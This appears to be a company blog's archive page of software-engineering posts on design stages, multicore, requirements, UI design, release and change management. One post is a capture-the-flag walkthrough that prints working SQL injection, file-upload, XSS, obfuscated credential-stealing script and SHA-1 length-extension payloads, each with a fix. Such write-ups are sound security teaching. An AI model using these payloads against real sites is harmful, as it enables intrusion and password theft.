You are currently browsing the archives for the Design Issues category.

Sailing the Seven C’s of design*

January 18th, 2013

I’m always looking for nice little mnemonics to help out remember the important concepts in design.  Here’s one for model-driven development I call the “Seven C’s”.  It basically enumerates the seven stages a design goes through, from initial idea to code.

CONCEPT
The Concept phase is about understanding the problem.  In other words: requirements analysis.  When you’re in Concept mode your main focus is on validation – am I solving the right problem for my customer?

CREATION
In Creation mode you are synthesising a solution.  At this stage we are building an Ideal model, ignoring many of the complications of the real world.  Our design should be completely concurrent (every object has its own thread of control), completely asynchronous (messaging) and completely flat (no hierarchy)
Your focus should be on:

  • Design verification – if I can’t demonstrate an ideal design works then there’s no way a less-than-ideal design will work!
  • Design evaluation – as with all design: is this the best compromise?

COMPOSITION
Also known as ‘design levelling’ (but that doesn’t start with C!).  Your Ideal model probably has some high-level elements (components, etc) that need further refinement; and plenty of low-level elements (objects) that can be collected together to perform ‘emergent’ behaviours.  Design levelling is the act of (re)organising the design into appropriate levels of abstraction – sub-systems, components, objects, etc.

CONCURRENCY
Our Ideal model treats every element as concurrent, but experience tells us that isn’t practical for a real software system, so reduce the number of concurrent elements in our system to get the most effective solution with the smallest number of threads.

CONSTRUCTION
Like any other construction project our plans must contain enough information so that skilled implementers can build our dream.  In our case the construction plans are our class diagrams, composite structures, state machines and algorithm descriptions.
Once in the construction stage our focus is on verification – doesn’t this design still fulfil its requirements?

CORRUPTION
Our construction models may be complete and may be translatable directly to code.  However, the result of that translation may not be ideal; and may not benefit from many of the features of our chosen implementation language.  Corruption is the act of modifying our design to make the most effective use of our implementation language and platform.

CODE
The end result.

How does this all map onto typical model-driven-design nomenclature?  Well, pretty much like this:

Computationally-Independent Model (CIM)
•    Concept

Platform-Independent Model (PIM)
•    Creation
•    Composition
•    Concurrency
•    Construction

Platform-Specific Model (PSM)
•    Corruption
•    Code

*  Apologies to all the grammar fanatics out there for my use of the “grocer’s apostrophe”

Capturing the Stripe-d Flag 2.0 – The After Party

August 30th, 2012

Following on from our previous article looking at Stripe’s Capture the Flag 2.0 challenge, Team Feabhas cracked the last of the levels and its members should hopefully be receiving their complementary t-shirts soon.

It has proven to be a popular article with lots of people coming to the blog for solutions and walk-through, and now that the competition has finished we have decided to share the way we approached each of these levels, their solution and the way in which the attack vector can be mitigated.

Level 0

The Brief

We are told that the key to level 1 is stored in the database and we have to ‘crack’ it. Looking at the code we can see that it holds data in a key|value pair but we don’t know the key so we can’t get the value.

app.post('/*', function(req, res) {
        var namespace = req.body['namespace'];
        var secret_name = req.body['secret_name'];
        var secret_value = req.body['secret_value'];

        var query = 'INSERT INTO secrets (key, secret) VALUES (? || "." || ?, ?)';
        db.run(query, namespace, secret_name, secret_value, function(err) {
                if (err) throw err;
                res.header('Content-Type', 'text/html');
                res.redirect(req.path + '?namespace=' + namespace);
         });
});

The Hack

The code provided lists the following function:

app.get('/*', function(req, res) {
  var namespace = req.param('namespace');

  if (namespace) {
    var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';
    db.all(query, namespace, function(err, secrets) {
             if (err) throw err;

             renderPage(res, {namespace: namespace, secrets: secrets});
           });
  } else {
    renderPage(res, {});
  }
});

When you request this page by performing a GET operation, the SQL query
SELECT * FROM secrets WHERE key LIKE ? || ".%"
is performed. The ? after LIKE in the query is the placeholder for the user submitted data which isn’t sanitised at all. The trick to overcoming this is to use the ‘%’ character as the namespace value which is a MySQL wildcard for pattern matching which turns our statement into:
SELECT * FROM secrets WHERE key LIKE % || ".%"
This has the effect of telling the database to return all key pairs in the database – including the key to level 1.

One of the things to note is that the hack needs to be performed either from the text input box on the page, or from a tool such as cURL

The Fix

Never trust data from the client. This would’ve been fixed by limiting the type of data allowed to be submitted and sanitising it before execution.

Level 1

The Brief

We’re told that this machine is secure and we’ll have to try all possibilities but something is off with the code.

The Hack

The code is provided in the form of a PHP file which features the following snippet:

<?php
	$filename = 'secret-combination.txt';
	extract($_GET);
	if (isset($attempt)) {
		$combination = trim(file_get_contents($filename));
		if ($attempt === $combination) {
			echo " $next<p>How did you know the secret combination was" . " $combination!? $next</p>";
			$next = file_get_contents('level02-password.txt');
			echo " $next<p>You've earned the password to the access Level 2:" . " $next</p>";
		} else {
		  	echo " $next<p>Incorrect! The secret combination is not $attempt $next</p>";
		}
	}
?>

What happens here is that the password submitted is tested against a value read in from $filename using the function file_get_contents which will read the given file into a string but if the call is unsuccessful it will simply return an empty string.

If we look at the extract() function, we can see it extracts variables into the variable namespace, overriding any existing ones. Note that $filename is declared, then extract() is called and then it is used.

By combining these things, we can override the value $filename to a non-existent file to get a comparison between two empty strings. To use this we simply visit: https://level01-2.stripe-ctf.com/user-USERNAME/?attempt=&filename=

The Fix

Again, don’t trust data from users! Using extract into the current symbol table means your variables can be overwritten – especially on $_GET variables that can be submitted by users. For any web API, you should know what parameters are expected and to check for those explicitly.

A safer way to code this would have been:

<?php
$filename = 'secret-combination.txt'; if (isset($_GET['attempt'])) { $combination = trim(file_get_contents($filename)); if ($attempt === $combination) { echo " $next<p>How did you know the secret combination was" . " $combination!? $next</p>"; next = file_get_contents('level02-password.txt');
echo " $next<p>You've earned the password to the access Level 2:" . " $next</p>"; } else { echo " $next<p>Incorrect! The secret combination is not $attempt $next</p>";
} } ?>

Level 2

The Brief

We’re given access to Stripe’s Social Network “which are all the rage” and told to fill in our profile picture and that there’s a file called password.txt that contains the password for level 3.

The Hack

Again, we’re provided with the source code that shows that we can upload an arbitrary file to the /uploads directory! Oh dear.
The hack here is to upload a simple PHP script, which we’ll call foo.php, that contains the following

<?php
	echo "Password is: " . file_get_contents("../password.txt");
?>

and then visit https://level02-4.stripe-ctf.com/user-USERNAME/uploads/foo.php to see the password for level 3. The ability to upload our own scripts is a useful ability… one that is used later one to good effect!

The Fix

Check what gets uploaded by your users. You can discard any file types that aren’t acceptable as well as forbidding access to scripts in the uploads directory.
There are various examples of scripts that will perform some kind of sanity check on uploaded files. A simple search for php validate image upload will provide plenty of examples to use as a starting point.

Level 3

The Brief

We’re told that the new storage mechanism uses a human login and that user ‘bob’ holds the password for level 3.

The Hack

This is another case of SQL injection. In this case the offending line is the query string

    query = """SELECT id, password_hash, salt FROM users
               WHERE username = '{0}' LIMIT 1""".format(username)
    cursor.execute(query)

    res = cursor.fetchone()
    if not res:
        return "There's no such user {0}!\n".format(username)
    user_id, password_hash, salt = res

    calculated_hash = hashlib.sha256(password + salt)
    if calculated_hash.hexdigest() != password_hash:
        return "That's not the password for {0}!\n".format(username)

We can see that we can tag on some SQL of our own in this scenario, in this case we want to make use of SQLs UNION statement.

UNION allows you to combine two or more result sets from multiple tables together. We’re going to use this to turn the statement into the following (note that {0} is replaced with our injection string):

SELECT id, password_hash, salt FROM users WHERE username = 'NULL' UNION SELECT id, HASH_WE_KNOW, SALT_WE_KNOW FROM users WHERE username = 'bob' -- LIMIT 1"

The bold text is the string we’re going to insert, the -- at the end is used to comment out the LIMIT 1 part of the query.

So we have the query string but we need to get our hash and salt so we can complete it. The sample above featured the line:


    calculated_hash = hashlib.sha256(password + salt)
    if calculated_hash.hexdigest() != password_hash:
        return "That's not the password for {0}!\n".format(username)

We can simply use our python interpreter to do the hard work for us to generate the requisite hexdigest from a password of ‘xx’ and a salt of ‘x’ to keep things simple:

[nick@slimtop ~]$ python
Python 2.7.3 (default, Jul 24 2012, 10:05:39) 
[GCC 4.7.0 20120507 (Red Hat 4.7.0-5)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import hashlib
>>> print hashlib.sha256('xx' + 'x').hexdigest()
cd2eb0837c9b4c962c22d2ff8b5441b7b45805887f051d39bf133b583baf6860

All that’s left is to enter the query string NULL' UNION SELECT id, 'cd2eb0837c9b4c962c22d2ff8b5441b7b45805887f051d39bf133b583baf6860', 'x' FROM users WHERE username = 'bob' -- as the username and set our password to be ‘xx’ and in we go.

The Fix

This is a far more complex fix to implement, as one really has to think like a cracker however, a good starting point would be
The SQL Injection Prevention Cheat Sheet from the Open Web Application Security Project

Level 4

The Brief

We’re told about a piece of software called Karma Trader that allows people to reward others with karma for good deeds – the caveat being that

In order to ensure you’re transferring karma only to good people, transferring karma to a user will also reveal your password to him or her.

The Hack

The presence of the jQuery library is a good indicator that we’re going to be doing something untoward using it. The hack here is a very simple XSS exploit to make use of the fact that our password will be shown to people we transfer karma to. We simply set our password to be a piece of jQuery code that will use the jQuery.post() function to send some karma to our user naughty_man

So we create our account as naughty_man with the password of <script>$.post("transfer", {to: "naughty_man", amount: "50"} )</script> and send some karma to karma_trader.
When she next logs in, she will unknowingly execute our script which will send us some karma and her password for the next level.

The Fix

As before – the primary concept is not to trust any input that comes from the user. The input fields should be URL encoded and escaped to ensure that they are safe. Again, The SQL Injection Prevention Cheat Sheet from the Open Web Application Security Project provides a good starting point.

Level 5

The Brief

We’re told about a new type of federated identity system where you provide a username, password and pingback URL where a simple “AUTHENTICATED” or “DENIED” is posted to the pingback location.
We’re also informed that we will need to authenticate as a user of level 5 and that it can only make outbound requests to other stripe-ctf.com servers.

Interestingly, we’re told that someone forgot to firewall off the high ports from the Level 2 server.

The Hack

There are two parts to this hack, get authenticated at a lower level and then pingback to gain authentication at level 5.
To accomplish the first part, we need to get a stripe-ctf.com server to provide us with an ‘AUTHENTICATED’ string, Fortunately for us, we still have access to level 2!

Looking at the code, we can see the regex that is used to authenticate:

	def authenticated?(body)
		body =~ /[^\w]AUTHENTICATED[^\w]*$/
	end

We simply upload a script, stripe_auth.php, to print that string out:

<?php
print " AUTHENTICATED \n"; /* Note the spaces either side are matched for! */
?>

We can then specify this location as our pingback URL to gain initial authentication at level 2 – http://level02-2.stripe-ctf.com/user-USERNAME/uploads/stripe_auth.php

The second part required a bit of lateral thinking – reading our logged in page we can see it says:

You are authenticated as hacker@level02-2.stripe-ctf.com

The word authenticated here is enough to say we’re authenticated as level 5! – To use it we just tell it to use itself by specifying a pingback URL of:
https://level05-1.stripe-ctf.com/user-USERNAME/?pingback=http://level02-2.stripe-ctf.com/user-USERNAME/uploads/stripe_auth.php

This provides us with the password for our next level!

The Fix

Once again – we should not trust any input provided by the user. If we are going to allow some kind of authentication server, then we need to be able to trust the remote server. Taking it on the word of a user is not good enough!

We should either have a hard coded list of servers that we trust, or implement some kind of trust mechanism – such as public key cryptography

Also, the fatal flaw in the design was to include the keyword for authentication within the level 5 server output.

Level 6

The Brief

We’re told that after the catastrophe of level 4 the Karma Trader was shutdown but a new service, Streamer, was created. The security of this app has been beefed up and the password of the first user contains double quotes and apostrophes to complicate things… but that it’s also the password to level 7

The Hack

Looking through the source code for Streamer for these so-called precautions we come across the following lines of code:

   def self.safe_insert(table, key_values)
      key_values.each do |key, value|
        # Just in case people try to exfiltrate
        # level07-password-holder's password
        if value.kind_of?(String) &&
            (value.include?('"') || value.include?("'"))
          raise "Value has unsafe characters"
        end
      end

This forbids any insertion of values containing either an apostrophe ‘ or double quote ” – Very important!

To explore the site a bit more, we create an account and have a look at how the posts are stored and manipulated. In the HTML we see the following:

<script>
      var username = "naughty_man";
      var post_data = [{"time":"Fri Aug 24 19:54:42 +0000 2012","title":"Hello World","user":"level07-password-holder","id":null,"body":"Welcome to Streamer, the most streamlined way of sharing\nupdates with your friends!\n\nOne great feature of Streamer is that no password resets are needed. I, for\nexample, have a very complicated password (including apostrophes, quotes, you\nname it!). But I remember it by clicking my name on the right-hand side and\nseeing what my password is.\n\nNote also that Streamer can run entirely within your corporate firewall. My\nmachine, for example, can only talk directly to the Streamer server itself!"}];
       function escapeHTML(val) {
        return $('
').text(val).html(); } function addPost(item) { var new_element = '<tr><th>' + escapeHTML(item['user']) + '</th><td><h4>' + escapeHTML(item['title']) + '</h4>' + escapeHTML(item['body']) + '</td></tr>'; $('#posts > tbody:last').prepend(new_element); } for(var i = 0; i < post_data.length; i++) { var item = post_data[i]; addPost(item); }; </script>

So interestingly, we can see that the posts are stored in a way that can be maliciously escaped with an errant </script> tag – we can test it by posting </script><script>alert(0);</script> and checking that the alert window is visible after a refreshing the browser window – success.

What we want to do is read in the contents of ‘user_info’ that we can see holds the current users password and make sure that we don’t use any single or double quote characters as submitting these is not allowed – quite the challenge.

Fortunately for us, we can use jQuery.get() to retrieve a page for us and we can also force the browser to then submit this page (or the last 180 characters of it) in the form provided without any user intervention – This type of attack is called a Cross Site Request Forgery.

What we will do is:

// Get the page 'user_info' into a string with the jQuery function
$.get('user_info'), function(data){
	// Remove all of the string apart from the last 180 characters to keep it short
	data = data.substr(data.length - 180);
	// Replace any double quotes with the text 
	data = data.replace('\"','<DOUBLE>');
	// Replace any single quotes with the text 
	data = data.replace('\'','<SINGLE>'); 
	// We know there's only one form so set it's value to be our data
	document.forms[0].content.value = data;
	// We know there's only one form so 'click' submit on the first form of the document
	document.forms[0].submit(); 
});

One problem we have is that we typically need to use quotes to demark strings in our JavaScript which are forbidden but fortunately we can use a combination of JavaScript’s eval() operation and String.fromCharCode to accomplish what we need.

String.fromCharCode() will allow us to encode forbidden characters that will be replaced at runtime by the eval() function – such that alert('Hi') becomes, alert(eval(String.fromCharCode(39, 72, 105, 39))).

So knowing this, we can create our script and then convert it to using eval/String.fromCharCode so that our naughty script goes from…

}];// </script><script>$.get('user_info'), function(data){ data = data.substr(data.length - 180); data = data.replace('\"',''); data = data.replace('\'',''); document.forms[0].content.value = data; document.forms[0].submit(); });</script> 

to this.

}];// </script><script>$.get(eval(String.fromCharCode(39, 117, 115, 101, 114, 95, 105, 110, 102, 111, 39)), function(data){ data = data.substr(data.length - 180); data = data.replace(eval(String.fromCharCode(39, 92, 34, 39)),eval(String.fromCharCode(39, 60, 68, 79, 85, 66, 76, 69, 62, 39))); data = data.replace(eval(String.fromCharCode(39, 92, 39, 39)),eval(String.fromCharCode(39, 60, 83, 73, 78, 71, 76, 69, 62, 39))); document.forms[0].content.value = data; document.forms[0].submit(); });</script> 

Finally, we can insert this into the stream (preferably with JavaScript disabled unless you want to run it yourself!) and wait for the first user to log in and unwittingly execute our script and post their valuable credentials.

The Fix

By now, we should be totally paranoid about any input data! Be sure to strip, encode or filter and reject user data if it contains any HTML characters with safe alternatives such that so that ‘<’ becomes
&lt;. A read of the Secure-Programs-HOWTO is a good way to become aware of the ways that users can trick you into running bad code.

Level 7

The Brief

For level 7, we are introduced to an on-line waffle ordering system. There are two levels of waffles that can be ordered, standard waffles and ‘premium’ waffles. We only have access to the standard waffles, but we need to be able to place on order for a premium waffle to reveal the password for the next level.
We are provided with an API to the ordering system along with our secret key and a page (/logs/<user_id>)where we can view any previous orders we may have placed.

The Hack

The API for the system attempts to be secure by using a message signing system. There are two parts to the order, the parameters of count, user_id, latitude, longitude and waffle. These are then signed with an SHA1 algorithm using our secret key. This would give a string such as:

count=1&lat=0&user_id=5&long=0&waffle=liege|sig:a2f7af47b2633dd00f94d204e03d2a3f9a012674

This means we can exploit a
SHA padding attack
. This enables us to create a valid SHA1 key without knowing the original secret

The design of the system allows to find the order log of any user by changing the user ID on the logs page. From this we can get an original order from a privileged user:

count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo|sig:5fe387f05d3b205b6d10108c8f31312c8fd56711

There are tools that can generate SHA padding:

We want to add the parameter waffle=liege to the parameters, and using the tools we get a new string of:

count=2&lat=37.351&user_id=1&long=-119.827&waffle=chicken\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x028&waffle=liege|sig:c0b55677bf18c7b48a32f1f705667e11008b93b2

The Fix

The first reason why we are able to use this hack is because it is very simple to find the logs of other users – these should be protected – and the second reason is because the input has not been sanitised correctly.
The code used is:

def parse_params(raw_params):
    pairs = raw_params.split('&')
    params = {}
    for pair in pairs:
        key, val = pair.split('=')
        key = urllib.unquote_plus(key)
        val = urllib.unquote_plus(val)
        params[key] = val
    return params

This allows the same key to be submitted twice, and the second time it will overwrite the value of the first.

By changing the code to something like the following:

def parse_params(raw_params):
    pairs = raw_params.split('&')
    params = {}
    for pair in pairs:
        key, val = pair.split('=')
        key = urllib.unquote_plus(key)
        val = urllib.unquote_plus(val)
        if not key in params:
            params[key] = val
    return params

the second instance of ‘waffle’ would have been ignored.

Level 8

The Brief

For level 8 we had to crack a new password storing mechanism. To supposedly increase security, a password is split between four separate servers – so that even if one server was compromised, the password would still be secure. To check a password, a 12 digit password was submitted to the main server and it would simply return ‘success’ or ‘failure’.

The system also provided a webhook that would be called by the main server to return the result of the password attempt.

To make life more interesting, the password server had been firewalled, so that it could only be reached from another stripe-ctf.com server and in addition to this, the system has delays inserted safe to prevent timing attacks such that the main server always returned the success or failure of a password in a consistent time.

The Hack

We knew from previous levels, that we could launch our attack from the compromised level 2 server – so that was one part of the challenge solved.

Looking at the design of the algorithm, it was fairly obvious that the fundamental flaw was that by splitting the key into 4 chunks of 3 digits, it greatly reduced the possible combinations from 1012 to 103 which is feasible to attack by brute force.

The first attempt at cracking this involved finding the four servers by sweeping through the port numbers for a valid response and then attacking each of chunk servers in turn. While this worked locally – it failed on the stripe servers as the chunk servers were firewalled and could not be reached from the level 2 server…

By going back to the logs, we finally noticed the second flaw in the system. The main server split the 12 digits into chunks and submitted the chunks to the chunk servers in turn. However, if any of the chunk servers returned a failure, then for efficiency, the main server stopped checking and returned the result to the server specified in the webhook. This actually turned out to be the key flaw in the system, as the webhook could look at the successive client port numbers from the main server and work out how far along the system it had got (client port numbers are assigned sequentially – so the each call to a chunk server would use a port number – therefore the fewer port numbers used between calls indicated that the password failed early).

Therefore it became possible to brute force the first chunk by looking for a port difference of 2, the second chunk for a port difference of 3 and for chunk 3 a port difference of 4.

The Fix

Aside from the flaw in the system that reduced the possible combinations to a point where it became feasible to brute force the attack – the main flaw that allowed the attack to succeed was the shortcut of not submitting all the chunks to all the servers each time.
While this may have seemed like a good idea for computational efficiency, it proved to be the weak link that could then be exploited.

Conclusion

Hopefully this has been a useful and insightful article on the many ways that web applications can be attacked – just today Google published an article about how difficult content hosting on the modern web has become and if those sorts of players are struggling with it then it’s a very serious issue indeed.

You should sign up for our mailing list to hear about our latest blog articles and exciting new course offerings and if you have insight or alternative solutions we’d love to hear about them in the comments.

Can existing embedded applications benefit from Multicore Technology?

June 15th, 2012

It feels that not a day goes by without a new announcement regarding a major development in multicore technology. With so much press surrounding multicore, you have to ask the question “Is it for me?” i.e. can I utilise multicore technology in my embedded application?

However, from a software developer’s perspective, all the code examples seem to demonstrate the (same) massive performance improvements to “rendering fractals” or “ray tracing programs”. The examples always refer to Amdahl’s Law, showing gains when using, say, 16- or 128-cores. This is all very interesting, but not what I would imagine most embedded developers would consider “embedded”.  These types of programs are sometimes referred to as “embarrassingly parallel” as it is so obvious they would benefit from parallel processing. In addition the examples use proprietary solutions, such as TBB from Intel, or language extensions with limited platform support, e.g. OpenMP. In addition, this area of parallelisation is being addressed more and more by using multicore General Purpose Graphics Processing Units (GPGPU), such as PowerVR from Imagination Technologies and Mali from ARM, using OpenCL; however this is getting off-topic.

So taking “fractals”, OpenMP and GPGPUs out of the equation, is multicore really useful for embedded systems? Read more »

The Five Orders of Ignorance

December 30th, 2011

It’s not often you read a paper that has something unique and fresh to say about a topic, and expresses it in a clear and concise way.

Somehow, Phillip Armour’s The Five Orders of Ignorance had eluded me, until I found it referenced in another paper.

It really is an interesting point of view on software development.  You can read the paper here.

Armour’s central tenet is software is a mechanism for capturing knowledge. That is, (correct) software is the result of having understood, and formalised our knowledge about the problem we are developing.

Clearly, at each stage of the development process we have different levels of knowledge (or ignorance; the conjugate of knowledge) about our problem.  As we move towards delivery our knowledge increases; and our ignorance decreases – hopefully!

A stratified, or layered, model of ignorance gives a good measure of our progress through the development – in some ways a far superior model than the traditional time/artefact/activity–based approach.

Armour’s levels – or orders – of ignorance are as follows:

Zero Order Ignorance is knowledge; something we know and can articulate (in software)

First Order Ignorance is something we don’t know; a question we need an answer to.

Second Order Ignorance are the things we don’t know we don’t know.  That is, we don’t even know what questions to ask.

Third Order Ignorance is lack of methodology – we don’t have techniques, tools or processes that can identify and illuminate our lack of knowledge.

Fourth Order Ignorance means we don’t even know there are orders of ignorance!

(In many ways Armour’s work is a far more cohesive version of Donald Rumsfeld’s infamous “Known Knowns” speech.)

Armour’s paper crystallised a couple of very important points to me:

Why requirements analysis is so vital.

For nearly the last decade I have been promoting the importance of requirements analysis as a key part of development.  If we understand the problem we are meant to solve – completely and with precision – developing a solution in software is relatively straightforward. 

It’s heartening that most engineers are actually pretty good at developing solutions. But they’re not really very good at understanding problems. When people call me in to help with ‘design issues’ it’s most commonly the case they don’t actually understand their problem properly. Usually, I help their ‘design’ skills by doing detailed requirements analysis with them!

I have found the teams that spend most time performing requirements analysis spend the least time designing and debugging and have the most comprehensive and maintainable solutions.  This is because their software captures the system knowledge efficiently and their code isn’t riddled with what Armour calls ‘unknowledge’ – irrelevant, or incorrect knowledge about the system captured as code (you know, the stuff that leads to ‘features’!)

What process is all about.

Processes are a technique to give you questions, not answers. I think this upsets many developers (and their managers).  Many people want handle-turning solutions: Feed in some customer requirements, crank the handle, and out comes lovely, pristine software. 

Unfortunately, but the world doesn’t work like that.  If it did, we’d all be replaced by machines (that’s been threatened since the Sixties and it hasn’t happened yet. I’m not holding my breath, either.) 

Every software problem is unique and full of those delicious little subtleties that make our jobs as embedded developers so interesting (and yes, you can take ‘interesting’ in the sense of the old Chinese curse!) There is simply no way you can mechanise the behaviours needed to elicit, understand and formalise all the knowledge required to develop a typical embedded system.

Most approaches to software process description assumes software development is a (linear) mechanical process; and the (procedural) transformation of input artefact to output artefact will (somehow) produce working software.  Whilst this approach works for other manufacturing processes it cannot deal with the simple fact that software development is about knowledge capture and, well, we often don’t know what we don’t know!

The best processes are those that consist of a set of goals and a corresponding set of methodologies.  The goals effectively give you an appropriate set of questions that must be answered before you can continue; the answers to those questions will yield pertinent information about the system. 

One could argue the artefacts are supposed to embody the appropriate design questions but engineers are notorious for simply filling in the blanks with banal waffle just so they can move on to the interesting stuff – that is, hacking code (and learning about the system!)

More appalling user interface design

December 16th, 2011

I came across a wonderfully counter-intuitive piece of user interface design this week.

The room I was in had a sliding shutter (that, for reasons best known to the architects, opened into the main building and not outside).  The two halves of the shutter are controlled independently – that is, you can close one side or the other, or both.  Each shutter is controlled with independent switch panels.

Common sense would suggest a single rocker switch: pushing one side would close the shutter; pushing the other would open it.  The designers, however, had other ideas and selected the implementation below:

Annotated interface

 

Each shutter has a pair of single-action switches – one to close the shutter (the one at the top) and one to open the shutter.

Pressing the top switch (on its right hand side) closes the shutter – as expected.

Pressing the bottom switch on its left hand side (the intuitive action) does nothing.  In fact, you have to press the bottom switch on its right hand side to get it to do anything.

Even better, the switch panel for the right shutter is an exact copy of the the left; so the controls are completely opposite  – the top switch opens the shutter, the bottom switch closes it!

As they say:  good design is like oxygen – you don’t notice it until it’s not there.

Releasing Code

June 20th, 2011

The Release process

The Release process defines the actions required to deliver a software product to an external customer. The external customer is any entity outside the development department. This may be a true (paying) customer, or may be another engineering department, for example Testing or Production.

The Release process is a triggered activity. The trigger events are scheduled as part of project planning. Defining a release is a project milestone which must define

  • What will be released
  • When it will be released
  • Who it will be released to

 

Release process relationships

The Release process is related to, but independent of, the Change Management, Revision Control and Build Processes.

 

image

Figure 21 – Release management is related to, but independent of, the other CM practices

Change Management

Defines the modifications and/or additions to the product, the order in which the changes are incorporated.

Revision Control

Ensures the configuration of the product is controlled and reproducible.

Build Process

Defines how to build the product.

Release Process

Defines the target recipient of the product.

 

Software release stages

During development the product may be released:

  • To different standards
  • To different customers

The different releases comprise a release lifecycle, with each stage representing an improvement in product quality (Figure 22).

 

image

Figure 22 – Each release type represents a different level of quality, and may be released to different customers
 
Development releases

Development releases are internal releases; usually to (independent) test. These releases are unlikely to be ‘feature-complete’; often the release represents one or more work packages (or, in the case of Agile projects, features or ‘sprints’).

It is not expected that these early releases are perfect. It is likely they have only undergone developer testing. A significant number of bugs can be expected in early releases.

Development releases may be produced at high frequency. Weekly releases would be expected at the beginning of development, possibly rising to daily as the project enters a debug phase.

Alpha and Beta

Alpha and Beta releases focus on usage and/or useability testing. Sometimes these are known as Technical Preview releases. The product may be feature-complete (or close) at this stage. Alpha/Beta releases are relatively stable and should contain no (known) critical bugs.

Alpha testing consists of simulated or actual operational testing. It is normally carried out in-house and performed by non-development users, for example internal proxy-customers (staff acting on behalf of the ‘real’ customers).

Beta testing is also operational testing. It is often performed out-house (that is, outside the control of the development organisation). It is carried out by focus groups, or specially selected users. Very often Beta releases are made available free to existing customers to use and test in their own environment.

It is important not to begin Alpha and Beta releases too early in the development cycle. Although allowing users to test the product is potentially very effective a product with many bugs (particularly in areas of key user functionality) can lead to a loss of confidence in the product that is very difficult to recover.

Production-ready releases

The term Release candidate refers to a version with the potential to be a final product. It is essentially ready to release unless fatal bugs emerge during final testing (or possibly Alpha or Beta testing). The product features all designed functions and no known critical bugs.

A Production release is very similar to a Release Candidate ( in fact, it could be argued the Production release is just the final release candidate!). Any last minute bugs fixed. The Production release represents final product quality and features, and it the release sent to Production engineering.

Change Management

June 13th, 2011

Change Management is concerned with the proposal, selection and scheduling of changes during the lifecycle of a project.

Change Management is interlinked with, but separate to, Revision Control.

Change Management is the core to controlling your development processes. Without effective Change Management the management of your project is subject to slavish adherence to a (fixed, and pre-determined) project plan, with no mechanism for dealing with inevitable changes in requirements, design, implementation or testing.

It is no surprise that Change Management is at the heart of so many Agile process, such as SCRUM.

Change Request

The core of Change Management is the Change Request (often abbreviated simply as CR) A Change Request has many different names, all meaning the same thing:

  • Change Note (CN)
  • Engineering Change (Order)
  • Engineering Change Request (ECR)
  • Action Request (AR)
  • Request For Change (RFC)

Essentially, a Change Request is a call for an adjustment to a system. Change requests typically originate from one of five sources (Dennis, Wixom, & Tegarden, 2002):

  • Bugs that must be fixed
  • System enhancement requests from users
  • Events in the development of other systems
  • Changes in underlying structure and or standards
  • Demands from senior management

 

The CR Artefact

A CR is a project artefact – that is, it is a entity that is created, worked on, stored and audited, just like every other artefact in the system. The CR represents the lifecycle of a change. As such it has a different lifecycle to other artefacts.

As an artefact the CR may (in fact, should) also be held under revision control.

The CR lifecycle is shown in Figure 19. There are three main parts to the lifecycle.

 

image

Figure 19 – The Change Request is an artefact with its own unique lifecycle

 
Opening the CR

Creating a CR records that some change to the system is requested; it does imply that the work will be performed. Once created the change must be reviewed before it can be worked on. The review is performed by the Change Control Board (CCB). The CCB consists of stakeholders who will be affected by the change, and those who can decide whether the change is worth doing. At the minimum this will be the Project Manager or Team Leader; but may include a multi-disciplinary group including engineering, senior management, marketing, customer support, etc.

The CR must be assessed for impact to the project. This work should ideally be done by the CR submitter. Points considered during the assessment of a change request include:

  • Technical feasibility
  • Timescales
  • Customer expectation
  • Resource
  • Quality
  • etc.

The CR may be Accepted (Opened for working), Rejected (Infeasible or invalid) or Deferred (delayed; therefore inducing technical debt to the project)

Open CRs

Once opened project artefacts can be modified. Each artefact follows its own Configuration Item lifecycle (Figure 20). The CR records artefacts modified. Each artefact records the changes made in support of the CR.

 

image

Figure 20 – Each artefact modified under the Change Request follows its own change lifecycle
 
Including the change

The completed change should be reviewed again by the CCB. The purpose of the review is to assess whether the change is valid – That is, do the modifications made to the system correctly addresses the change requested? An invalid change will be rejected for rework.

Once accepted the change can be integrated into the product.

 

Change Management is often overlooked in CM. Change Management controls precisely what is going to change in the project and when. Without Change Management a project is running on ad hoc and unrecorded decisions by the development team or project manager and runs a serious risk of heading out of control.  Although the Change Management presented here involves project artefacts (CRs) many Agile processes adopt similar principles using techniques such as Product Backlogs and Feature Lists (SCRUM), which are organised by customer priority. These mechanisms are, in effect, simple Change Management processes.

Baselines and Branching

June 6th, 2011

A baseline is an identified set of files and directories in which there is one and only one version of each file and directory.

A baseline identifies one particular configuration of the software (or a subset thereof)

The baseline represents a fixed point in the development; that may be recreated as required.

Specifying a Baseline

A baseline defines a set of files, each at a particular version. These need not be the latest (most recent) version. A baseline label uniquely identifies the configuration. Files may belong to one or more baselines.

image

Figure 12 – A baseline defines a set of files, each at a particular version.

 

In the example of Figure 12 baseline BL1.0 is the first baseline recorded. It consists of seven artefacts, each at a unique revision number. For this example, assume that BL1 records the most recent versions of each artefact. As development progresses each artefact is modified as required (that is, some artefact are modified, some are not). At some time later another baseline is taken – BL2.0. In this case BL2.0 records the current latest revisions of each file. Notice that artefact F is unchanged, so F v1.0 is included in both baseline BL1.0 and BL2.0.

In general each successive baseline contains more recent versions of files (but not always).

When to use baselines

Baselines are a key tool in managing and auditing the state of a project. Baselines should be created prior to any significant project activity:

Development

Baselines provide a ‘working’ point in the project’s configuration. Recording a baseline prior to making a major change to the system allows the development to start from a known working point and, in the event of something going wrong, to ‘roll-back’ to that working configuration.

Baselines should be made prior to starting any new package of work (as evidence of project progress); and new feature development; prior to changing or upgrading any tools; etc.

Release

A baseline records the complete configuration of the product that is being distributed from the development department (whether that is an external customer or just the test department).

Audit

Baselines provide process evidence for audits and also time-stamped evidence of the project’s progress (for example, starting a particular work package)

 

Baseline of baselines

In larger, more complex systems, we may choose to manage the system complexity using a ‘Components’ approach. Each ‘component’ represents some aspect of system functionality – for example a subsystem. Using this approach each component of the system has its own (unique) baselines, independent of any other component (Figure 13).

image

Figure 13 – each component of the system has its own unique set of baselines

Note, not shown in this example is the fact that components may share artefacts. For example, both component A and component B may share a common artefact H; with each component using a different revision.

image

Figure 14 – A complete system constructed from a  ‘baseline of baselines’

The (complete) product’s baselines are constructed from (unique) combinations of the component’s baselines (Figure 14). This method is known as a ‘Baseline of baselines.’

 

Branch Patterns

